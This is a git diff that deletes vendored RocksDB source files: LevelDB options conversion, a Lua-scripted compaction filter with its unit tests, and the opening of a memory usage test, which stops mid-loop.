--- a/thirdparty/rocksdb/utilities/leveldb_options/leveldb_options.cc
+++ /dev/null
@@ -1,56 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/utilities/leveldb_options.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-LevelDBOptions::LevelDBOptions()
-    : comparator(BytewiseComparator()),
-      create_if_missing(false),
-      error_if_exists(false),
-      paranoid_checks(false),
-      env(Env::Default()),
-      info_log(nullptr),
-      write_buffer_size(4 << 20),
-      max_open_files(1000),
-      block_cache(nullptr),
-      block_size(4096),
-      block_restart_interval(16),
-      compression(kSnappyCompression),
-      filter_policy(nullptr) {}
-
-Options ConvertOptions(const LevelDBOptions& leveldb_options) {
-  Options options = Options();
-  options.create_if_missing = leveldb_options.create_if_missing;
-  options.error_if_exists = leveldb_options.error_if_exists;
-  options.paranoid_checks = leveldb_options.paranoid_checks;
-  options.env = leveldb_options.env;
-  options.info_log.reset(leveldb_options.info_log);
-  options.write_buffer_size = leveldb_options.write_buffer_size;
-  options.max_open_files = leveldb_options.max_open_files;
-  options.compression = leveldb_options.compression;
-
-  BlockBasedTableOptions table_options;
-  table_options.block_cache.reset(leveldb_options.block_cache);
-  table_options.block_size = leveldb_options.block_size;
-  table_options.block_restart_interval = leveldb_options.block_restart_interval;
-  table_options.filter_policy.reset(leveldb_options.filter_policy);
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  return options;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/lua/rocks_lua_compaction_filter.cc b/thirdparty/rocksdb/utilities/lua/rocks_lua_compaction_filter.cc
deleted file mode 100644
index 0934ca9..0000000
--- a/thirdparty/rocksdb/utilities/lua/rocks_lua_compaction_filter.cc
+++ /dev/null
@@ -1,242 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#if defined(LUA) && !defined(ROCKSDB_LITE)
-#include "rocksdb/utilities/lua/rocks_lua_compaction_filter.h"
-
-extern "C" {
-#include <luaconf.h>
-}
-
-#include "rocksdb/compaction_filter.h"
-
-namespace rocksdb {
-namespace lua {
-
-const std::string kFilterFunctionName = "Filter";
-const std::string kNameFunctionName = "Name";
-
-void RocksLuaCompactionFilter::LogLuaError(const char* format, ...) const {
-  if (options_.error_log.get() != nullptr &&
-      error_count_ < options_.error_limit_per_filter) {
-    error_count_++;
-
-    va_list ap;
-    va_start(ap, format);
-    options_.error_log->Logv(InfoLogLevel::ERROR_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-bool RocksLuaCompactionFilter::Filter(int level, const Slice& key,
-                                      const Slice& existing_value,
-                                      std::string* new_value,
-                                      bool* value_changed) const {
-  auto* lua_state = lua_state_wrapper_.GetLuaState();
-  // push the right function into the lua stack
-  lua_getglobal(lua_state, kFilterFunctionName.c_str());
-
-  int error_no = 0;
-  int num_input_values;
-  int num_return_values;
-  if (options_.ignore_value == false) {
-    // push input arguments into the lua stack
-    lua_pushnumber(lua_state, level);
-    lua_pushlstring(lua_state, key.data(), key.size());
-    lua_pushlstring(lua_state, existing_value.data(), existing_value.size());
-    num_input_values = 3;
-    num_return_values = 3;
-  } else {
-    // If ignore_value is set to true, then we only put two arguments
-    // and expect one return value
-    lua_pushnumber(lua_state, level);
-    lua_pushlstring(lua_state, key.data(), key.size());
-    num_input_values = 2;
-    num_return_values = 1;
-  }
-
-  // perform the lua call
-  if ((error_no =
-           lua_pcall(lua_state, num_input_values, num_return_values, 0)) != 0) {
-    LogLuaError("[Lua] Error(%d) in Filter function --- %s", error_no,
-                lua_tostring(lua_state, -1));
-    // pops out the lua error from stack
-    lua_pop(lua_state, 1);
-    return false;
-  }
-
-  // As lua_pcall went successfully, it can be guaranteed that the top
-  // three elements in the Lua stack are the three returned values.
-
-  bool has_error = false;
-  const int kIndexIsFiltered = -num_return_values;
-  const int kIndexValueChanged = -num_return_values + 1;
-  const int kIndexNewValue = -num_return_values + 2;
-
-  // check the types of three return values
-  // is_filtered
-  if (!lua_isboolean(lua_state, kIndexIsFiltered)) {
-    LogLuaError(
-        "[Lua] Error in Filter function -- "
-        "1st return value (is_filtered) is not a boolean "
-        "while a boolean is expected.");
-    has_error = true;
-  }
-
-  if (options_.ignore_value == false) {
-    // value_changed
-    if (!lua_isboolean(lua_state, kIndexValueChanged)) {
-      LogLuaError(
-          "[Lua] Error in Filter function -- "
-          "2nd return value (value_changed) is not a boolean "
-          "while a boolean is expected.");
-      has_error = true;
-    }
-    // new_value
-    if (!lua_isstring(lua_state, kIndexNewValue)) {
-      LogLuaError(
-          "[Lua] Error in Filter function -- "
-          "3rd return value (new_value) is not a string "
-          "while a string is expected.");
-      has_error = true;
-    }
-  }
-
-  if (has_error) {
-    lua_pop(lua_state, num_return_values);
-    return false;
-  }
-
-  // Fetch the return values
-  bool is_filtered = false;
-  if (!has_error) {
-    is_filtered = lua_toboolean(lua_state, kIndexIsFiltered);
-    if (options_.ignore_value == false) {
-      *value_changed = lua_toboolean(lua_state, kIndexValueChanged);
-      if (*value_changed) {
-        const char* new_value_buf = lua_tostring(lua_state, kIndexNewValue);
-        const size_t new_value_size = lua_strlen(lua_state, kIndexNewValue);
-        // Note that any string that lua_tostring returns always has a zero at
-        // its end, bu/t it can have other zeros inside it
-        assert(new_value_buf[new_value_size] == '\0');
-        assert(strlen(new_value_buf) <= new_value_size);
-        new_value->assign(new_value_buf, new_value_size);
-      }
-    } else {
-      *value_changed = false;
-    }
-  }
-  // pops the three return values.
-  lua_pop(lua_state, num_return_values);
-  return is_filtered;
-}
-
-const char* RocksLuaCompactionFilter::Name() const {
-  if (name_ != "") {
-    return name_.c_str();
-  }
-  auto* lua_state = lua_state_wrapper_.GetLuaState();
-  // push the right function into the lua stack
-  lua_getglobal(lua_state, kNameFunctionName.c_str());
-
-  // perform the call (0 arguments, 1 result)
-  int error_no;
-  if ((error_no = lua_pcall(lua_state, 0, 1, 0)) != 0) {
-    LogLuaError("[Lua] Error(%d) in Name function --- %s", error_no,
-                lua_tostring(lua_state, -1));
-    // pops out the lua error from stack
-    lua_pop(lua_state, 1);
-    return name_.c_str();
-  }
-
-  // check the return value
-  if (!lua_isstring(lua_state, -1)) {
-    LogLuaError(
-        "[Lua] Error in Name function -- "
-        "return value is not a string while string is expected");
-  } else {
-    const char* name_buf = lua_tostring(lua_state, -1);
-    const size_t name_size __attribute__((unused)) = lua_strlen(lua_state, -1);
-    assert(name_buf[name_size] == '\0');
-    assert(strlen(name_buf) <= name_size);
-    name_ = name_buf;
-  }
-  lua_pop(lua_state, 1);
-  return name_.c_str();
-}
-
-/* Not yet supported
-bool RocksLuaCompactionFilter::FilterMergeOperand(
-    int level, const Slice& key, const Slice& operand) const {
-  auto* lua_state = lua_state_wrapper_.GetLuaState();
-  // push the right function into the lua stack
-  lua_getglobal(lua_state, "FilterMergeOperand");
-
-  // push input arguments into the lua stack
-  lua_pushnumber(lua_state, level);
-  lua_pushlstring(lua_state, key.data(), key.size());
-  lua_pushlstring(lua_state, operand.data(), operand.size());
-
-  // perform the call (3 arguments, 1 result)
-  int error_no;
-  if ((error_no = lua_pcall(lua_state, 3, 1, 0)) != 0) {
-    LogLuaError("[Lua] Error(%d) in FilterMergeOperand function --- %s",
-        error_no, lua_tostring(lua_state, -1));
-    // pops out the lua error from stack
-    lua_pop(lua_state, 1);
-    return false;
-  }
-
-  bool is_filtered = false;
-  // check the return value
-  if (!lua_isboolean(lua_state, -1)) {
-    LogLuaError("[Lua] Error in FilterMergeOperand function -- "
-                "return value is not a boolean while boolean is expected");
-  } else {
-    is_filtered = lua_toboolean(lua_state, -1);
-  }
-
-  lua_pop(lua_state, 1);
-
-  return is_filtered;
-}
-*/
-
-bool RocksLuaCompactionFilter::IgnoreSnapshots() const {
-  return options_.ignore_snapshots;
-}
-
-RocksLuaCompactionFilterFactory::RocksLuaCompactionFilterFactory(
-    const RocksLuaCompactionFilterOptions opt)
-    : opt_(opt) {
-  auto filter = CreateCompactionFilter(CompactionFilter::Context());
-  name_ = std::string("RocksLuaCompactionFilterFactory::") +
-          std::string(filter->Name());
-}
-
-std::unique_ptr<CompactionFilter>
-RocksLuaCompactionFilterFactory::CreateCompactionFilter(
-    const CompactionFilter::Context& context) {
-  std::lock_guard<std::mutex> lock(opt_mutex_);
-  return std::unique_ptr<CompactionFilter>(new RocksLuaCompactionFilter(opt_));
-}
-
-std::string RocksLuaCompactionFilterFactory::GetScript() {
-  std::lock_guard<std::mutex> lock(opt_mutex_);
-  return opt_.lua_script;
-}
-
-void RocksLuaCompactionFilterFactory::SetScript(const std::string& new_script) {
-  std::lock_guard<std::mutex> lock(opt_mutex_);
-  opt_.lua_script = new_script;
-}
-
-const char* RocksLuaCompactionFilterFactory::Name() const {
-  return name_.c_str();
-}
-
-}  // namespace lua
-}  // namespace rocksdb
-#endif  // defined(LUA) && !defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/utilities/lua/rocks_lua_test.cc b/thirdparty/rocksdb/utilities/lua/rocks_lua_test.cc
deleted file mode 100644
index 025acaf..0000000
--- a/thirdparty/rocksdb/utilities/lua/rocks_lua_test.cc
+++ /dev/null
@@ -1,498 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <stdio.h>
-
-#if !defined(ROCKSDB_LITE)
-
-#if defined(LUA)
-
-#include <string>
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/lua/rocks_lua_compaction_filter.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class StopOnErrorLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    vfprintf(stderr, format, ap);
-    fprintf(stderr, "\n");
-    FAIL();
-  }
-};
-
-
-class RocksLuaTest : public testing::Test {
- public:
-  RocksLuaTest() : rnd_(301) {
-    temp_dir_ = test::TmpDir(Env::Default());
-    db_ = nullptr;
-  }
-
-  std::string RandomString(int len) {
-    std::string res;
-    for (int i = 0; i < len; ++i) {
-      res += rnd_.Uniform(26) + 'a';
-    }
-    return res;
-  }
-
-  void CreateDBWithLuaCompactionFilter(
-      const lua::RocksLuaCompactionFilterOptions& lua_opt,
-      const std::string& db_path,
-      std::unordered_map<std::string, std::string>* kvs,
-      const int kNumFlushes = 5,
-      std::shared_ptr<rocksdb::lua::RocksLuaCompactionFilterFactory>*
-          output_factory = nullptr) {
-    const int kKeySize = 10;
-    const int kValueSize = 50;
-    const int kKeysPerFlush = 2;
-    auto factory =
-        std::make_shared<rocksdb::lua::RocksLuaCompactionFilterFactory>(
-            lua_opt);
-    if (output_factory != nullptr) {
-      *output_factory = factory;
-    }
-
-    options_ = Options();
-    options_.create_if_missing = true;
-    options_.compaction_filter_factory = factory;
-    options_.disable_auto_compactions = true;
-    options_.max_bytes_for_level_base =
-        (kKeySize + kValueSize) * kKeysPerFlush * 2;
-    options_.max_bytes_for_level_multiplier = 2;
-    options_.target_file_size_base = (kKeySize + kValueSize) * kKeysPerFlush;
-    options_.level0_file_num_compaction_trigger = 2;
-    DestroyDB(db_path, options_);
-    ASSERT_OK(DB::Open(options_, db_path, &db_));
-
-    for (int f = 0; f < kNumFlushes; ++f) {
-      for (int i = 0; i < kKeysPerFlush; ++i) {
-        std::string key = RandomString(kKeySize);
-        std::string value = RandomString(kValueSize);
-        kvs->insert({key, value});
-        ASSERT_OK(db_->Put(WriteOptions(), key, value));
-      }
-      db_->Flush(FlushOptions());
-    }
-  }
-
-  ~RocksLuaTest() {
-    if (db_) {
-      delete db_;
-    }
-  }
-  std::string temp_dir_;
-  DB* db_;
-  Random rnd_;
-  Options options_;
-};
-
-TEST_F(RocksLuaTest, Default) {
-  // If nothing is set in the LuaCompactionFilterOptions, then
-  // RocksDB will keep all the key / value pairs, but it will also
-  // print our error log indicating failure.
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    ASSERT_OK(db_->Get(ReadOptions(), entry.first, &value));
-    ASSERT_EQ(value, entry.second);
-  }
-}
-
-TEST_F(RocksLuaTest, KeepsAll) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // keeps all the key value pairs
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"KeepsAll\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    ASSERT_OK(db_->Get(ReadOptions(), entry.first, &value));
-    ASSERT_EQ(value, entry.second);
-  }
-}
-
-TEST_F(RocksLuaTest, GetName) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  const std::string kScriptName = "SimpleLuaCompactionFilter";
-  lua_opt.lua_script =
-      std::string(
-          "function Filter(level, key, existing_value)\n"
-          "  return false, false, \"\"\n"
-          "end\n"
-          "\n"
-          "function FilterMergeOperand(level, key, operand)\n"
-          "  return false\n"
-          "end\n"
-          "function Name()\n"
-          "  return \"") + kScriptName + "\"\n"
-      "end\n"
-      "\n";
-
-  std::shared_ptr<CompactionFilterFactory> factory =
-      std::make_shared<lua::RocksLuaCompactionFilterFactory>(lua_opt);
-  std::string factory_name(factory->Name());
-  ASSERT_NE(factory_name.find(kScriptName), std::string::npos);
-}
-
-TEST_F(RocksLuaTest, RemovesAll) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // removes all the key value pairs
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  return true, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"RemovesAll\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-}
-
-TEST_F(RocksLuaTest, FilterByKey) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // removes all keys whose initial is less than 'r'
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  if key:sub(1,1) < 'r' then\n"
-      "    return true, false, \"\"\n"
-      "  end\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"KeepsAll\"\n"
-      "end\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    if (entry.first[0] < 'r') {
-      ASSERT_TRUE(s.IsNotFound());
-    } else {
-      ASSERT_TRUE(s.ok());
-      ASSERT_TRUE(value == entry.second);
-    }
-  }
-}
-
-TEST_F(RocksLuaTest, FilterByValue) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // removes all values whose initial is less than 'r'
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  if existing_value:sub(1,1) < 'r' then\n"
-      "    return true, false, \"\"\n"
-      "  end\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"FilterByValue\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    if (entry.second[0] < 'r') {
-      ASSERT_TRUE(s.IsNotFound());
-    } else {
-      ASSERT_TRUE(s.ok());
-      ASSERT_EQ(value, entry.second);
-    }
-  }
-}
-
-TEST_F(RocksLuaTest, ChangeValue) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // Replace all values by their reversed key
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  return false, true, key:reverse()\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"ChangeValue\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    ASSERT_OK(db_->Get(ReadOptions(), entry.first, &value));
-    std::string new_value = entry.first;
-    std::reverse(new_value.begin(), new_value.end());
-    ASSERT_EQ(value, new_value);
-  }
-}
-
-TEST_F(RocksLuaTest, ConditionallyChangeAndFilterValue) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // Performs the following logic:
-  // If key[0] < 'h' --> replace value by reverse key
-  // If key[0] >= 'r' --> keep the original key value
-  // Otherwise, filter the key value
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  if key:sub(1,1) < 'h' then\n"
-      "    return false, true, key:reverse()\n"
-      "  elseif key:sub(1,1) < 'r' then\n"
-      "    return true, false, \"\"\n"
-      "  end\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"ConditionallyChangeAndFilterValue\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    if (entry.first[0] < 'h') {
-      ASSERT_TRUE(s.ok());
-      std::string new_value = entry.first;
-      std::reverse(new_value.begin(), new_value.end());
-      ASSERT_EQ(value, new_value);
-    } else if (entry.first[0] < 'r') {
-      ASSERT_TRUE(s.IsNotFound());
-    } else {
-      ASSERT_TRUE(s.ok());
-      ASSERT_EQ(value, entry.second);
-    }
-  }
-}
-
-TEST_F(RocksLuaTest, DynamicChangeScript) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // keeps all the key value pairs
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"KeepsAll\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  std::shared_ptr<rocksdb::lua::RocksLuaCompactionFilterFactory> factory;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs, 30, &factory);
-  uint64_t count = 0;
-  ASSERT_TRUE(db_->GetIntProperty(
-      rocksdb::DB::Properties::kNumEntriesActiveMemTable, &count));
-  ASSERT_EQ(count, 0);
-  ASSERT_TRUE(db_->GetIntProperty(
-      rocksdb::DB::Properties::kNumEntriesImmMemTables, &count));
-  ASSERT_EQ(count, 0);
-
-  CompactRangeOptions cr_opt;
-  cr_opt.bottommost_level_compaction =
-      rocksdb::BottommostLevelCompaction::kForce;
-
-  // Issue full compaction and expect everything is in the DB.
-  ASSERT_OK(db_->CompactRange(cr_opt, nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    ASSERT_OK(db_->Get(ReadOptions(), entry.first, &value));
-    ASSERT_EQ(value, entry.second);
-  }
-
-  // change the lua script to removes all the key value pairs
-  factory->SetScript(
-      "function Filter(level, key, existing_value)\n"
-      "  return true, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"RemovesAll\"\n"
-      "end\n"
-      "\n");
-  {
-    std::string key = "another-key";
-    std::string value = "another-value";
-    kvs.insert({key, value});
-    ASSERT_OK(db_->Put(WriteOptions(), key, value));
-    db_->Flush(FlushOptions());
-  }
-
-  cr_opt.change_level = true;
-  cr_opt.target_level = 5;
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(cr_opt, nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-}
-
-TEST_F(RocksLuaTest, LuaConditionalTypeError) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  // Filter() error when input key's initial >= 'r'
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  if existing_value:sub(1,1) >= 'r' then\n"
-      "    return true, 2, \"\" -- incorrect type of 2nd return value\n"
-      "  end\n"
-      "  return true, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"BuggyCode\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  // Create DB with 10 files
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs, 10);
-
-  // Issue full compaction and expect all keys which initial is < 'r'
-  // will be deleted as we keep the key value when we hit an error.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    if (entry.second[0] < 'r') {
-      ASSERT_TRUE(s.IsNotFound());
-    } else {
-      ASSERT_TRUE(s.ok());
-      ASSERT_EQ(value, entry.second);
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-
-int main(int argc, char** argv) {
-  printf("LUA_PATH is not set.  Ignoring the test.\n");
-}
-
-#endif  // defined(LUA)
-
-#else
-
-int main(int argc, char** argv) {
-  printf("Lua is not supported in RocksDBLite.  Ignoring the test.\n");
-}
-
-#endif  // !defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/utilities/memory/memory_test.cc b/thirdparty/rocksdb/utilities/memory/memory_test.cc
deleted file mode 100644
index ee4f874..0000000
--- a/thirdparty/rocksdb/utilities/memory/memory_test.cc
+++ /dev/null
@@ -1,276 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "db/db_impl.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/table.h"
-#include "rocksdb/utilities/memory_util.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "table/block_based_table_factory.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class MemoryTest : public testing::Test {
- public:
-  MemoryTest() : kDbDir(test::TmpDir() + "/memory_test"), rnd_(301) {
-    assert(Env::Default()->CreateDirIfMissing(kDbDir).ok());
-  }
-
-  std::string GetDBName(int id) { return kDbDir + "db_" + ToString(id); }
-
-  std::string RandomString(int len) {
-    std::string r;
-    test::RandomString(&rnd_, len, &r);
-    return r;
-  }
-
-  void UpdateUsagesHistory(const std::vector<DB*>& dbs) {
-    std::map<MemoryUtil::UsageType, uint64_t> usage_by_type;
-    ASSERT_OK(GetApproximateMemoryUsageByType(dbs, &usage_by_type));
-    for (int i = 0; i < MemoryUtil::kNumUsageTypes; ++i) {
-      usage_history_[i].push_back(
-          usage_by_type[static_cast<MemoryUtil::UsageType>(i)]);
-    }
-  }
-
-  void GetCachePointersFromTableFactory(
-      const TableFactory* factory,
-      std::unordered_set<const Cache*>* cache_set) {
-    const BlockBasedTableFactory* bbtf =
-        dynamic_cast<const BlockBasedTableFactory*>(factory);
-    if (bbtf != nullptr) {
-      const auto bbt_opts = bbtf->table_options();
-      cache_set->insert(bbt_opts.block_cache.get());
-      cache_set->insert(bbt_opts.block_cache_compressed.get());
-    }
-  }
-
-  void GetCachePointers(const std::vector<DB*>& dbs,
-                        std::unordered_set<const Cache*>* cache_set) {
-    cache_set->clear();
-
-    for (auto* db : dbs) {
-      // Cache from DBImpl
-      StackableDB* sdb = dynamic_cast<StackableDB*>(db);
-      DBImpl* db_impl = dynamic_cast<DBImpl*>(sdb ? sdb->GetBaseDB() : db);
-      if (db_impl != nullptr) {
-        cache_set->insert(db_impl->TEST_table_cache());
-      }
-
-      // Cache from DBOptions
-      cache_set->insert(db->GetDBOptions().row_cache.get());
-
-      // Cache from table factories
-      std::unordered_map<std::string, const ImmutableCFOptions*> iopts_map;
-      if (db_impl != nullptr) {
-        ASSERT_OK(db_impl->TEST_GetAllImmutableCFOptions(&iopts_map));
-      }
-      for (auto pair : iopts_map) {
-        GetCachePointersFromTableFactory(pair.second->table_factory, cache_set);
-      }
-    }
-  }
-
-  Status GetApproximateMemoryUsageByType(
-      const std::vector<DB*>& dbs,
-      std::map<MemoryUtil::UsageType, uint64_t>* usage_by_type) {
-    std::unordered_set<const Cache*> cache_set;
-    GetCachePointers(dbs, &cache_set);
-
-    return MemoryUtil::GetApproximateMemoryUsageByType(dbs, cache_set,
-                                                       usage_by_type);
-  }
-
-  const std::string kDbDir;
-  Random rnd_;
-  std::vector<uint64_t> usage_history_[MemoryUtil::kNumUsageTypes];
-};
-
-TEST_F(MemoryTest, SharedBlockCacheTotal) {
-  std::vector<DB*> dbs;
-  std::vector<uint64_t> usage_by_type;
-  const int kNumDBs = 10;
-  const int kKeySize = 100;
-  const int kValueSize = 500;
-  Options opt;
-  opt.create_if_missing = true;
-  opt.write_buffer_size = kKeySize + kValueSize;
-  opt.max_write_buffer_number = 10;
-  opt.min_write_buffer_number_to_merge = 10;
-  opt.disable_auto_compactions = true;
-  BlockBasedTableOptions bbt_opts;
-  bbt_opts.block_cache = NewLRUCache(4096 * 1000 * 10);
-  for (int i = 0; i < kNumDBs; ++i) {
-    DestroyDB(GetDBName(i), opt);
-    DB* db = nullptr;
-    ASSERT_OK(DB::Open(opt, GetDBName(i), &db));
-    dbs.push_back(db);
-  }
-
-  std::vector<std::string> keys_by_db[kNumDBs];
-
-  // Fill one memtable per Put to make memtable use more memory.
-  for (int p = 0; p < opt.min_write_buffer_number_to_merge / 2; ++p) {
-    for (int i = 0; i < kNumDBs; ++i) {
-      for (int j = 0; j < 100; ++j) {
-        keys_by_db[i].emplace_back(RandomString(kKeySize));
-        dbs[i]->Put(WriteOptions(), keys_by_db[i].back(),
-                    RandomString(kValueSize));
